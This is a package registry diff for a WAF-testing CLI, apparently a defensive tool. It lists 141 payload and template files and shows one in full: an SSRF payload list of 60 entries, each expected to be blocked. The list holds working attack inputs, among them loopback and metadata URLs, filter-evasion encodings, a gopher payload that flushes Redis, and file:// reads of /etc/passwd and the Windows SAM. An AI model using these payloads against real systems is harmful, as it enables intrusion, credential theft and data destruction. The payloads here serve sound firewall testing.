@waftester/cli 2.8.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (141) hide show
  1. package/LICENSE +80 -0
  2. package/LICENSE-COMMUNITY +28 -0
  3. package/README.md +121 -0
  4. package/bin/cli.js +152 -0
  5. package/package.json +52 -0
  6. package/payloads/community/README.md +45 -0
  7. package/payloads/community/ai/ml-poisoning.json +173 -0
  8. package/payloads/community/ai/prompt-injection.json +247 -0
  9. package/payloads/community/ai/workflow-abuse.json +222 -0
  10. package/payloads/community/auth/jwt.json +855 -0
  11. package/payloads/community/auth/login-bypass.json +623 -0
  12. package/payloads/community/auth/mfa.json +402 -0
  13. package/payloads/community/auth/oauth.json +421 -0
  14. package/payloads/community/auth/open-redirect.json +1028 -0
  15. package/payloads/community/auth/session.json +404 -0
  16. package/payloads/community/cache/deception.json +402 -0
  17. package/payloads/community/cache/poisoning.json +403 -0
  18. package/payloads/community/deserialization/gadget.json +375 -0
  19. package/payloads/community/deserialization/prototype.json +370 -0
  20. package/payloads/community/fuzz/content-type.json +397 -0
  21. package/payloads/community/fuzz/headers.json +401 -0
  22. package/payloads/community/fuzz/methods.json +397 -0
  23. package/payloads/community/fuzz/obfuscation.json +362 -0
  24. package/payloads/community/fuzz/special-chars.json +740 -0
  25. package/payloads/community/fuzz/waf-bypass.json +452 -0
  26. package/payloads/community/graphql/batching-abuse.json +271 -0
  27. package/payloads/community/graphql/depth-limit.json +271 -0
  28. package/payloads/community/graphql/introspection.json +267 -0
  29. package/payloads/community/injection/crlf.json +569 -0
  30. package/payloads/community/injection/ldap.json +357 -0
  31. package/payloads/community/injection/nosqli.json +529 -0
  32. package/payloads/community/injection/oscmd.json +662 -0
  33. package/payloads/community/injection/rce-polyglots.json +452 -0
  34. package/payloads/community/injection/sqli.json +681 -0
  35. package/payloads/community/injection/ssti.json +584 -0
  36. package/payloads/community/injection/upload-attacks.json +632 -0
  37. package/payloads/community/injection/xpath.json +357 -0
  38. package/payloads/community/injection/xxe.json +716 -0
  39. package/payloads/community/logic/forced-browsing.json +405 -0
  40. package/payloads/community/logic/idor.json +1026 -0
  41. package/payloads/community/logic/privilege.json +337 -0
  42. package/payloads/community/media/exif-injection.json +225 -0
  43. package/payloads/community/media/metadata-poison.json +239 -0
  44. package/payloads/community/protocol/http-smuggling.json +798 -0
  45. package/payloads/community/protocol/http2-attacks.json +382 -0
  46. package/payloads/community/protocol/websocket-abuse.json +375 -0
  47. package/payloads/community/rate-limit/burst-simulation.json +286 -0
  48. package/payloads/community/rate-limit/bypass-attempts.json +326 -0
  49. package/payloads/community/rate-limit/zone-tests.json +332 -0
  50. package/payloads/community/services/authentik.json +415 -0
  51. package/payloads/community/services/immich.json +423 -0
  52. package/payloads/community/services/n8n.json +366 -0
  53. package/payloads/community/sqli-basic.json +182 -0
  54. package/payloads/community/ssrf/cloud-metadata.json +999 -0
  55. package/payloads/community/ssrf/dns-rebinding.json +503 -0
  56. package/payloads/community/ssrf/internal-networks.json +627 -0
  57. package/payloads/community/ssrf/protocol-smuggling.json +350 -0
  58. package/payloads/community/ssti/multi-language-templates.json +191 -0
  59. package/payloads/community/ssti/python-templates.json +200 -0
  60. package/payloads/community/traversal/basic.json +675 -0
  61. package/payloads/community/traversal/cloud-credentials.json +107 -0
  62. package/payloads/community/traversal/config-files.json +193 -0
  63. package/payloads/community/traversal/encoding.json +558 -0
  64. package/payloads/community/traversal/null-byte.json +105 -0
  65. package/payloads/community/traversal/symlink.json +93 -0
  66. package/payloads/community/traversal/unicode.json +134 -0
  67. package/payloads/community/traversal/unix-advanced.json +195 -0
  68. package/payloads/community/traversal/windows-advanced.json +195 -0
  69. package/payloads/community/waf-bypass/cloudflare-bypass.json +102 -0
  70. package/payloads/community/waf-bypass/encoding-bypass.json +120 -0
  71. package/payloads/community/waf-bypass/evasion-techniques.json +164 -0
  72. package/payloads/community/waf-bypass/hpp-bypass.json +92 -0
  73. package/payloads/community/waf-bypass/modsecurity-crs.json +220 -0
  74. package/payloads/community/waf-bypass/protocol-attacks.json +101 -0
  75. package/payloads/community/waf-bypass/sqlmap-tamper.json +252 -0
  76. package/payloads/community/waf-bypass/unicode-charset.json +152 -0
  77. package/payloads/community/waf-bypass/vendor-bypasses.json +72 -0
  78. package/payloads/community/waf-validation/README.md +172 -0
  79. package/payloads/community/waf-validation/bypass-techniques.json +272 -0
  80. package/payloads/community/waf-validation/custom-rules.json +952 -0
  81. package/payloads/community/waf-validation/evasion-techniques.json +272 -0
  82. package/payloads/community/waf-validation/modsecurity-core.json +151 -0
  83. package/payloads/community/waf-validation/owasp-top10.json +236 -0
  84. package/payloads/community/waf-validation/regression-tests.json +227 -0
  85. package/payloads/community/xss/csp-bypass.json +431 -0
  86. package/payloads/community/xss/dom.json +389 -0
  87. package/payloads/community/xss/filter-bypass.json +1242 -0
  88. package/payloads/community/xss/mutation.json +263 -0
  89. package/payloads/community/xss/polyglots.json +371 -0
  90. package/payloads/community/xss/reflected.json +187 -0
  91. package/payloads/community/xss/stored.json +330 -0
  92. package/payloads/crlf-injection.json +182 -0
  93. package/payloads/ids-map.json +155 -0
  94. package/payloads/ldap-injection.json +182 -0
  95. package/payloads/nosql-injection.json +227 -0
  96. package/payloads/prototype-pollution.json +182 -0
  97. package/payloads/request-smuggling.json +182 -0
  98. package/payloads/version.json +28 -0
  99. package/payloads/xss-advanced.json +227 -0
  100. package/templates/README.md +221 -0
  101. package/templates/nuclei/http/waf-bypass/crlf-bypass.yaml +146 -0
  102. package/templates/nuclei/http/waf-bypass/lfi-bypass.yaml +152 -0
  103. package/templates/nuclei/http/waf-bypass/nosqli-bypass.yaml +166 -0
  104. package/templates/nuclei/http/waf-bypass/rce-bypass.yaml +171 -0
  105. package/templates/nuclei/http/waf-bypass/sqli-basic.yaml +142 -0
  106. package/templates/nuclei/http/waf-bypass/sqli-evasion.yaml +192 -0
  107. package/templates/nuclei/http/waf-bypass/ssrf-bypass.yaml +130 -0
  108. package/templates/nuclei/http/waf-bypass/ssti-bypass.yaml +147 -0
  109. package/templates/nuclei/http/waf-bypass/xss-basic.yaml +163 -0
  110. package/templates/nuclei/http/waf-bypass/xss-evasion.yaml +217 -0
  111. package/templates/nuclei/http/waf-bypass/xxe-bypass.yaml +204 -0
  112. package/templates/nuclei/http/waf-detection/akamai-detect.yaml +105 -0
  113. package/templates/nuclei/http/waf-detection/aws-waf-detect.yaml +115 -0
  114. package/templates/nuclei/http/waf-detection/azure-waf-detect.yaml +114 -0
  115. package/templates/nuclei/http/waf-detection/cloudflare-detect.yaml +121 -0
  116. package/templates/nuclei/http/waf-detection/modsecurity-detect.yaml +129 -0
  117. package/templates/nuclei/workflows/waf-assessment-workflow.yaml +71 -0
  118. package/templates/output/asff.tmpl +61 -0
  119. package/templates/output/csv.tmpl +4 -0
  120. package/templates/output/junit.tmpl +34 -0
  121. package/templates/output/markdown-report.tmpl +92 -0
  122. package/templates/output/slack-notification.tmpl +95 -0
  123. package/templates/output/text-summary.tmpl +56 -0
  124. package/templates/overrides/api-only.yaml +130 -0
  125. package/templates/overrides/crs-tuning.yaml +204 -0
  126. package/templates/overrides/false-positive-suppression.yaml +159 -0
  127. package/templates/policies/owasp-top10.yaml +152 -0
  128. package/templates/policies/pci-dss.yaml +124 -0
  129. package/templates/policies/permissive.yaml +40 -0
  130. package/templates/policies/standard.yaml +57 -0
  131. package/templates/policies/strict.yaml +72 -0
  132. package/templates/report-configs/compliance.yaml +173 -0
  133. package/templates/report-configs/dark.yaml +136 -0
  134. package/templates/report-configs/enterprise.yaml +175 -0
  135. package/templates/report-configs/minimal.yaml +84 -0
  136. package/templates/report-configs/print.yaml +139 -0
  137. package/templates/workflows/api-scan.yaml +132 -0
  138. package/templates/workflows/ci-gate.yaml +129 -0
  139. package/templates/workflows/full-scan.yaml +133 -0
  140. package/templates/workflows/quick-probe.yaml +80 -0
  141. package/templates/workflows/waf-detection.yaml +89 -0
package/payloads/community/ssrf/internal-networks.json ADDED
@@ -0,0 +1,627 @@
1
+ [
2
+ {
3
+ "id": "SSRF-NET-001",
4
+ "payload": "http://10.0.0.1/",
5
+ "tags": [
6
+ "rfc1918",
7
+ "10-net",
8
+ "quick",
9
+ "critical"
10
+ ],
11
+ "expected_block": true,
12
+ "severity_hint": "Critical",
13
+ "notes": "RFC1918 10.0.0.0/8 network gateway",
14
+ "category": "SSRF"
15
+ },
16
+ {
17
+ "id": "SSRF-NET-002",
18
+ "payload": "http://10.0.0.10/admin",
19
+ "tags": [
20
+ "rfc1918",
21
+ "10-net",
22
+ "quick"
23
+ ],
24
+ "expected_block": true,
25
+ "severity_hint": "Critical",
26
+ "notes": "RFC1918 10.x admin endpoint",
27
+ "category": "SSRF"
28
+ },
29
+ {
30
+ "id": "SSRF-NET-003",
31
+ "payload": "http://10.10.10.10/",
32
+ "tags": [
33
+ "rfc1918",
34
+ "10-net"
35
+ ],
36
+ "expected_block": true,
37
+ "severity_hint": "Critical",
38
+ "notes": "Common RFC1918 10.x internal address",
39
+ "category": "SSRF"
40
+ },
41
+ {
42
+ "id": "SSRF-NET-004",
43
+ "payload": "http://192.168.0.1/",
44
+ "tags": [
45
+ "rfc1918",
46
+ "192-net",
47
+ "quick",
48
+ "critical"
49
+ ],
50
+ "expected_block": true,
51
+ "severity_hint": "Critical",
52
+ "notes": "RFC1918 192.168.0.0/16 network gateway",
53
+ "category": "SSRF"
54
+ },
55
+ {
56
+ "id": "SSRF-NET-005",
57
+ "payload": "http://192.168.1.1/",
58
+ "tags": [
59
+ "rfc1918",
60
+ "192-net",
61
+ "router",
62
+ "quick"
63
+ ],
64
+ "expected_block": true,
65
+ "severity_hint": "Critical",
66
+ "notes": "Common home router address",
67
+ "category": "SSRF"
68
+ },
69
+ {
70
+ "id": "SSRF-NET-006",
71
+ "payload": "http://192.168.1.254/",
72
+ "tags": [
73
+ "rfc1918",
74
+ "192-net",
75
+ "router"
76
+ ],
77
+ "expected_block": true,
78
+ "severity_hint": "Critical",
79
+ "notes": "Alternative common router address",
80
+ "category": "SSRF"
81
+ },
82
+ {
83
+ "id": "SSRF-NET-007",
84
+ "payload": "http://192.168.100.1/api",
85
+ "tags": [
86
+ "rfc1918",
87
+ "192-net"
88
+ ],
89
+ "expected_block": true,
90
+ "severity_hint": "High",
91
+ "notes": "RFC1918 192.168.x API endpoint",
92
+ "category": "SSRF"
93
+ },
94
+ {
95
+ "id": "SSRF-NET-008",
96
+ "payload": "http://172.16.0.1/",
97
+ "tags": [
98
+ "rfc1918",
99
+ "172-net",
100
+ "quick",
101
+ "critical"
102
+ ],
103
+ "expected_block": true,
104
+ "severity_hint": "Critical",
105
+ "notes": "RFC1918 172.16.0.0/12 network gateway",
106
+ "category": "SSRF"
107
+ },
108
+ {
109
+ "id": "SSRF-NET-009",
110
+ "payload": "http://172.16.10.10/",
111
+ "tags": [
112
+ "rfc1918",
113
+ "172-net"
114
+ ],
115
+ "expected_block": true,
116
+ "severity_hint": "Critical",
117
+ "notes": "RFC1918 172.16.x internal address",
118
+ "category": "SSRF"
119
+ },
120
+ {
121
+ "id": "SSRF-NET-010",
122
+ "payload": "http://172.31.255.254/",
123
+ "tags": [
124
+ "rfc1918",
125
+ "172-net"
126
+ ],
127
+ "expected_block": true,
128
+ "severity_hint": "Critical",
129
+ "notes": "RFC1918 172.16-31.x high range address",
130
+ "category": "SSRF"
131
+ },
132
+ {
133
+ "id": "SSRF-NET-011",
134
+ "payload": "http://127.0.0.1/",
135
+ "tags": [
136
+ "localhost",
137
+ "loopback",
138
+ "quick",
139
+ "critical"
140
+ ],
141
+ "expected_block": true,
142
+ "severity_hint": "Critical",
143
+ "notes": "Localhost loopback address",
144
+ "category": "SSRF"
145
+ },
146
+ {
147
+ "id": "SSRF-NET-012",
148
+ "payload": "http://127.0.0.1:8080/",
149
+ "tags": [
150
+ "localhost",
151
+ "loopback",
152
+ "alt-port",
153
+ "quick"
154
+ ],
155
+ "expected_block": true,
156
+ "severity_hint": "Critical",
157
+ "notes": "Localhost with common application port",
158
+ "category": "SSRF"
159
+ },
160
+ {
161
+ "id": "SSRF-NET-013",
162
+ "payload": "http://127.0.1.1/",
163
+ "tags": [
164
+ "localhost",
165
+ "loopback"
166
+ ],
167
+ "expected_block": true,
168
+ "severity_hint": "Critical",
169
+ "notes": "Alternative loopback address (Ubuntu default)",
170
+ "category": "SSRF"
171
+ },
172
+ {
173
+ "id": "SSRF-NET-014",
174
+ "payload": "http://localhost/",
175
+ "tags": [
176
+ "localhost",
177
+ "hostname",
178
+ "quick"
179
+ ],
180
+ "expected_block": true,
181
+ "severity_hint": "Critical",
182
+ "notes": "Localhost by hostname",
183
+ "category": "SSRF"
184
+ },
185
+ {
186
+ "id": "SSRF-NET-015",
187
+ "payload": "http://localhost:3000/api",
188
+ "tags": [
189
+ "localhost",
190
+ "hostname",
191
+ "alt-port"
192
+ ],
193
+ "expected_block": true,
194
+ "severity_hint": "Critical",
195
+ "notes": "Localhost with Node.js default port",
196
+ "category": "SSRF"
197
+ },
198
+ {
199
+ "id": "SSRF-NET-016",
200
+ "payload": "http://169.254.169.254/",
201
+ "tags": [
202
+ "link-local",
203
+ "quick",
204
+ "critical"
205
+ ],
206
+ "expected_block": true,
207
+ "severity_hint": "Critical",
208
+ "notes": "Link-local address (AWS IMDS, Azure IMDS)",
209
+ "category": "SSRF"
210
+ },
211
+ {
212
+ "id": "SSRF-NET-017",
213
+ "payload": "http://169.254.0.1/",
214
+ "tags": [
215
+ "link-local"
216
+ ],
217
+ "expected_block": true,
218
+ "severity_hint": "High",
219
+ "notes": "Link-local 169.254.0.0/16 range",
220
+ "category": "SSRF"
221
+ },
222
+ {
223
+ "id": "SSRF-NET-018",
224
+ "payload": "http://0.0.0.0/",
225
+ "tags": [
226
+ "wildcard",
227
+ "quick"
228
+ ],
229
+ "expected_block": true,
230
+ "severity_hint": "Critical",
231
+ "notes": "Wildcard address (can bind to all interfaces)",
232
+ "category": "SSRF"
233
+ },
234
+ {
235
+ "id": "SSRF-NET-019",
236
+ "payload": "http://0.0.0.0:8080/",
237
+ "tags": [
238
+ "wildcard",
239
+ "alt-port"
240
+ ],
241
+ "expected_block": true,
242
+ "severity_hint": "Critical",
243
+ "notes": "Wildcard address with application port",
244
+ "category": "SSRF"
245
+ },
246
+ {
247
+ "id": "SSRF-NET-020",
248
+ "payload": "http://[::]/",
249
+ "tags": [
250
+ "ipv6",
251
+ "wildcard"
252
+ ],
253
+ "expected_block": true,
254
+ "severity_hint": "Critical",
255
+ "notes": "IPv6 wildcard address",
256
+ "category": "SSRF"
257
+ },
258
+ {
259
+ "id": "SSRF-NET-021",
260
+ "payload": "http://[fe80::1]/",
261
+ "tags": [
262
+ "ipv6",
263
+ "link-local"
264
+ ],
265
+ "expected_block": true,
266
+ "severity_hint": "High",
267
+ "notes": "IPv6 link-local address",
268
+ "category": "SSRF"
269
+ },
270
+ {
271
+ "id": "SSRF-NET-022",
272
+ "payload": "http://[fc00::1]/",
273
+ "tags": [
274
+ "ipv6",
275
+ "unique-local"
276
+ ],
277
+ "expected_block": true,
278
+ "severity_hint": "High",
279
+ "notes": "IPv6 unique local address (fc00::/7)",
280
+ "category": "SSRF"
281
+ },
282
+ {
283
+ "id": "SSRF-NET-023",
284
+ "payload": "http://[fd00::1]/",
285
+ "tags": [
286
+ "ipv6",
287
+ "unique-local"
288
+ ],
289
+ "expected_block": true,
290
+ "severity_hint": "High",
291
+ "notes": "IPv6 unique local address (fd00::/8)",
292
+ "category": "SSRF"
293
+ },
294
+ {
295
+ "id": "SSRF-NET-024",
296
+ "payload": "http://0x7f000001/",
297
+ "tags": ["hex-ip", "localhost", "bypass"],
298
+ "expected_block": true,
299
+ "severity_hint": "Critical",
300
+ "notes": "Hex IP representation of 127.0.0.1",
301
+ "category": "SSRF"
302
+ },
303
+ {
304
+ "id": "SSRF-NET-025",
305
+ "payload": "http://2130706433/",
306
+ "tags": ["decimal-ip", "localhost", "bypass"],
307
+ "expected_block": true,
308
+ "severity_hint": "Critical",
309
+ "notes": "Decimal IP representation of 127.0.0.1",
310
+ "category": "SSRF"
311
+ },
312
+ {
313
+ "id": "SSRF-NET-026",
314
+ "payload": "http://0177.0.0.1/",
315
+ "tags": ["octal-ip", "localhost", "bypass"],
316
+ "expected_block": true,
317
+ "severity_hint": "Critical",
318
+ "notes": "Octal IP representation of 127.0.0.1",
319
+ "category": "SSRF"
320
+ },
321
+ {
322
+ "id": "SSRF-NET-027",
323
+ "payload": "http://0x7f.0x0.0x0.0x1/",
324
+ "tags": ["hex-dotted", "localhost", "bypass"],
325
+ "expected_block": true,
326
+ "severity_hint": "Critical",
327
+ "notes": "Dotted hex notation",
328
+ "category": "SSRF"
329
+ },
330
+ {
331
+ "id": "SSRF-NET-028",
332
+ "payload": "http://127.1/",
333
+ "tags": ["short-ip", "localhost", "bypass"],
334
+ "expected_block": true,
335
+ "severity_hint": "Critical",
336
+ "notes": "Short localhost notation",
337
+ "category": "SSRF"
338
+ },
339
+ {
340
+ "id": "SSRF-NET-029",
341
+ "payload": "http://127.0.1/",
342
+ "tags": ["short-ip", "localhost", "bypass"],
343
+ "expected_block": true,
344
+ "severity_hint": "Critical",
345
+ "notes": "Three-octet localhost notation",
346
+ "category": "SSRF"
347
+ },
348
+ {
349
+ "id": "SSRF-NET-030",
350
+ "payload": "http://0/",
351
+ "tags": ["zero-ip", "localhost", "bypass"],
352
+ "expected_block": true,
353
+ "severity_hint": "Critical",
354
+ "notes": "Zero as localhost",
355
+ "category": "SSRF"
356
+ },
357
+ {
358
+ "id": "SSRF-NET-031",
359
+ "payload": "http://0.0.0.0/",
360
+ "tags": ["zero-ip", "all-interfaces"],
361
+ "expected_block": true,
362
+ "severity_hint": "Critical",
363
+ "notes": "All interfaces address",
364
+ "category": "SSRF"
365
+ },
366
+ {
367
+ "id": "SSRF-NET-032",
368
+ "payload": "http://[::ffff:127.0.0.1]/",
369
+ "tags": ["ipv6-mapped", "localhost", "bypass"],
370
+ "expected_block": true,
371
+ "severity_hint": "Critical",
372
+ "notes": "IPv6 mapped IPv4 localhost",
373
+ "category": "SSRF"
374
+ },
375
+ {
376
+ "id": "SSRF-NET-033",
377
+ "payload": "http://[0:0:0:0:0:ffff:127.0.0.1]/",
378
+ "tags": ["ipv6-mapped", "expanded", "bypass"],
379
+ "expected_block": true,
380
+ "severity_hint": "Critical",
381
+ "notes": "Expanded IPv6 mapped localhost",
382
+ "category": "SSRF"
383
+ },
384
+ {
385
+ "id": "SSRF-NET-034",
386
+ "payload": "http://localtest.me/",
387
+ "tags": ["dns-bypass", "localhost"],
388
+ "expected_block": true,
389
+ "severity_hint": "High",
390
+ "notes": "DNS that resolves to 127.0.0.1",
391
+ "category": "SSRF"
392
+ },
393
+ {
394
+ "id": "SSRF-NET-035",
395
+ "payload": "http://127.0.0.1.nip.io/",
396
+ "tags": ["dns-bypass", "wildcard-dns"],
397
+ "expected_block": true,
398
+ "severity_hint": "High",
399
+ "notes": "nip.io wildcard DNS localhost",
400
+ "category": "SSRF"
401
+ },
402
+ {
403
+ "id": "SSRF-NET-036",
404
+ "payload": "http://127.0.0.1.xip.io/",
405
+ "tags": ["dns-bypass", "wildcard-dns"],
406
+ "expected_block": true,
407
+ "severity_hint": "High",
408
+ "notes": "xip.io wildcard DNS localhost",
409
+ "category": "SSRF"
410
+ },
411
+ {
412
+ "id": "SSRF-NET-037",
413
+ "payload": "http://spoofed.burpcollaborator.net/",
414
+ "tags": ["dns-bypass", "collaborator"],
415
+ "expected_block": true,
416
+ "severity_hint": "High",
417
+ "notes": "Burp Collaborator DNS exfil",
418
+ "category": "SSRF"
419
+ },
420
+ {
421
+ "id": "SSRF-NET-038",
422
+ "payload": "http://127.0.0.1:22/",
423
+ "tags": ["port-scan", "ssh"],
424
+ "expected_block": true,
425
+ "severity_hint": "High",
426
+ "notes": "Internal port scan - SSH",
427
+ "category": "SSRF"
428
+ },
429
+ {
430
+ "id": "SSRF-NET-039",
431
+ "payload": "http://127.0.0.1:3306/",
432
+ "tags": ["port-scan", "mysql"],
433
+ "expected_block": true,
434
+ "severity_hint": "Critical",
435
+ "notes": "Internal port scan - MySQL",
436
+ "category": "SSRF"
437
+ },
438
+ {
439
+ "id": "SSRF-NET-040",
440
+ "payload": "http://127.0.0.1:5432/",
441
+ "tags": ["port-scan", "postgres"],
442
+ "expected_block": true,
443
+ "severity_hint": "Critical",
444
+ "notes": "Internal port scan - PostgreSQL",
445
+ "category": "SSRF"
446
+ },
447
+ {
448
+ "id": "SSRF-NET-041",
449
+ "payload": "http://127.0.0.1:6379/",
450
+ "tags": ["port-scan", "redis"],
451
+ "expected_block": true,
452
+ "severity_hint": "Critical",
453
+ "notes": "Internal port scan - Redis",
454
+ "category": "SSRF"
455
+ },
456
+ {
457
+ "id": "SSRF-NET-042",
458
+ "payload": "http://127.0.0.1:27017/",
459
+ "tags": ["port-scan", "mongodb"],
460
+ "expected_block": true,
461
+ "severity_hint": "Critical",
462
+ "notes": "Internal port scan - MongoDB",
463
+ "category": "SSRF"
464
+ },
465
+ {
466
+ "id": "SSRF-NET-043",
467
+ "payload": "http://127.0.0.1:9200/",
468
+ "tags": ["port-scan", "elasticsearch"],
469
+ "expected_block": true,
470
+ "severity_hint": "Critical",
471
+ "notes": "Internal port scan - Elasticsearch",
472
+ "category": "SSRF"
473
+ },
474
+ {
475
+ "id": "SSRF-NET-044",
476
+ "payload": "http://127.0.0.1:11211/",
477
+ "tags": ["port-scan", "memcached"],
478
+ "expected_block": true,
479
+ "severity_hint": "Critical",
480
+ "notes": "Internal port scan - Memcached",
481
+ "category": "SSRF"
482
+ },
483
+ {
484
+ "id": "SSRF-NET-045",
485
+ "payload": "dict://127.0.0.1:11211/",
486
+ "tags": ["protocol", "dict", "memcached"],
487
+ "expected_block": true,
488
+ "severity_hint": "Critical",
489
+ "notes": "Dict protocol to memcached",
490
+ "category": "SSRF"
491
+ },
492
+ {
493
+ "id": "SSRF-NET-046",
494
+ "payload": "gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a",
495
+ "tags": ["protocol", "gopher", "redis-rce"],
496
+ "expected_block": true,
497
+ "severity_hint": "Critical",
498
+ "notes": "Gopher Redis RCE - flushall",
499
+ "category": "SSRF"
500
+ },
501
+ {
502
+ "id": "SSRF-NET-047",
503
+ "payload": "gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00root%00%00mysql_native_password",
504
+ "tags": ["protocol", "gopher", "mysql"],
505
+ "expected_block": true,
506
+ "severity_hint": "Critical",
507
+ "notes": "Gopher MySQL connection attempt",
508
+ "category": "SSRF"
509
+ },
510
+ {
511
+ "id": "SSRF-NET-048",
512
+ "payload": "file:///etc/passwd",
513
+ "tags": ["protocol", "file", "lfi"],
514
+ "expected_block": true,
515
+ "severity_hint": "Critical",
516
+ "notes": "File protocol read",
517
+ "category": "SSRF"
518
+ },
519
+ {
520
+ "id": "SSRF-NET-049",
521
+ "payload": "file:///c:/windows/system32/config/sam",
522
+ "tags": ["protocol", "file", "windows"],
523
+ "expected_block": true,
524
+ "severity_hint": "Critical",
525
+ "notes": "File protocol Windows SAM",
526
+ "category": "SSRF"
527
+ },
528
+ {
529
+ "id": "SSRF-NET-050",
530
+ "payload": "ldap://127.0.0.1:389/",
531
+ "tags": ["protocol", "ldap"],
532
+ "expected_block": true,
533
+ "severity_hint": "High",
534
+ "notes": "LDAP protocol internal",
535
+ "category": "SSRF"
536
+ },
537
+ {
538
+ "id": "SSRF-NET-051",
539
+ "payload": "sftp://127.0.0.1/",
540
+ "tags": ["protocol", "sftp"],
541
+ "expected_block": true,
542
+ "severity_hint": "High",
543
+ "notes": "SFTP protocol internal",
544
+ "category": "SSRF"
545
+ },
546
+ {
547
+ "id": "SSRF-NET-052",
548
+ "payload": "tftp://127.0.0.1/",
549
+ "tags": ["protocol", "tftp"],
550
+ "expected_block": true,
551
+ "severity_hint": "High",
552
+ "notes": "TFTP protocol internal",
553
+ "category": "SSRF"
554
+ },
555
+ {
556
+ "id": "SSRF-NET-053",
557
+ "payload": "http://127。0。0。1/",
558
+ "tags": ["unicode-dot", "bypass"],
559
+ "expected_block": true,
560
+ "severity_hint": "High",
561
+ "notes": "Unicode ideographic full stop (U+3002)",
562
+ "category": "SSRF"
563
+ },
564
+ {
565
+ "id": "SSRF-NET-054",
566
+ "payload": "http://127%E3%80%820%E3%80%820%E3%80%821/",
567
+ "tags": ["unicode-dot", "encoded", "bypass"],
568
+ "expected_block": true,
569
+ "severity_hint": "High",
570
+ "notes": "URL-encoded Unicode dots",
571
+ "category": "SSRF"
572
+ },
573
+ {
574
+ "id": "SSRF-NET-055",
575
+ "payload": "http://ⓛⓞⓒⓐⓛⓗⓞⓢⓣ/",
576
+ "tags": ["unicode-letters", "bypass"],
577
+ "expected_block": true,
578
+ "severity_hint": "High",
579
+ "notes": "Circled letters spelling localhost",
580
+ "category": "SSRF"
581
+ },
582
+ {
583
+ "id": "SSRF-NET-056",
584
+ "payload": "http://①②⑦.⓪.⓪.①/",
585
+ "tags": ["unicode-numbers", "bypass"],
586
+ "expected_block": true,
587
+ "severity_hint": "High",
588
+ "notes": "Circled numbers for IP",
589
+ "category": "SSRF"
590
+ },
591
+ {
592
+ "id": "SSRF-NET-057",
593
+ "payload": "http://localhost%00.evil.com/",
594
+ "tags": ["null-byte", "hostname-bypass"],
595
+ "expected_block": true,
596
+ "severity_hint": "Critical",
597
+ "notes": "Null byte hostname truncation",
598
+ "category": "SSRF"
599
+ },
600
+ {
601
+ "id": "SSRF-NET-058",
602
+ "payload": "http://evil.com@127.0.0.1/",
603
+ "tags": ["url-confusion", "auth-bypass"],
604
+ "expected_block": true,
605
+ "severity_hint": "Critical",
606
+ "notes": "URL authority confusion",
607
+ "category": "SSRF"
608
+ },
609
+ {
610
+ "id": "SSRF-NET-059",
611
+ "payload": "http://127.0.0.1#@evil.com/",
612
+ "tags": ["url-confusion", "fragment"],
613
+ "expected_block": true,
614
+ "severity_hint": "High",
615
+ "notes": "Fragment-based URL confusion",
616
+ "category": "SSRF"
617
+ },
618
+ {
619
+ "id": "SSRF-NET-060",
620
+ "payload": "http://127.0.0.1%23@evil.com/",
621
+ "tags": ["url-confusion", "encoded-fragment"],
622
+ "expected_block": true,
623
+ "severity_hint": "High",
624
+ "notes": "Encoded fragment URL confusion",
625
+ "category": "SSRF"
626
+ }
627
+ ]